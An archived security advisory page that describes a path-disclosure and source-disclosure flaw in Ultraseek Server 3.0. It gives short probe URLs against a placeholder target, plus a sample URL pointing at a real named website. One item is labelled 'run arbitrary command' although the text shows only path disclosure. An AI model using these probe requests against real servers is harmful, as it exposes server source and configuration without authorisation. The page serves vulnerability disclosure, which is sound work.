Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: Apps :: useek3.htm

Ultraseek Directory Traversal Vulnerability



Vulnerability

    Ultraseek

Affected

    Ultraseek Server 3.0

Description

    Following is  based on  a CHINANSL  Security Advisory  CSA-200012.
    CHINANLS security team has  found a security problem  in Ultraseek
    Server 3.0.   It is  possible that  a malicious  user can  get the
    absolute path and source code of Ultraseek Server addons.

    Ultraseek Server  with interpreter  can interpret  the script file
    and execute some correcpond  functions, but Ultraseek Server  have
    some bug to exploit the script file.

    (1) run arbitrary command:

        http://target:8765/null.html

        Ultraseek Server will return:

        The path where Ultraseek Server install and other information.

    (2) we can get the content of source code files with this bug too:

        http://target:8765/index.html/

    Ultraseek Server will  return the conten  of index.html and  other
    source code which work for Ultraseek Server.

    Sample:

        http://www.sun.com.cn:8765/index.html/

Solution

    Nothing yet.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH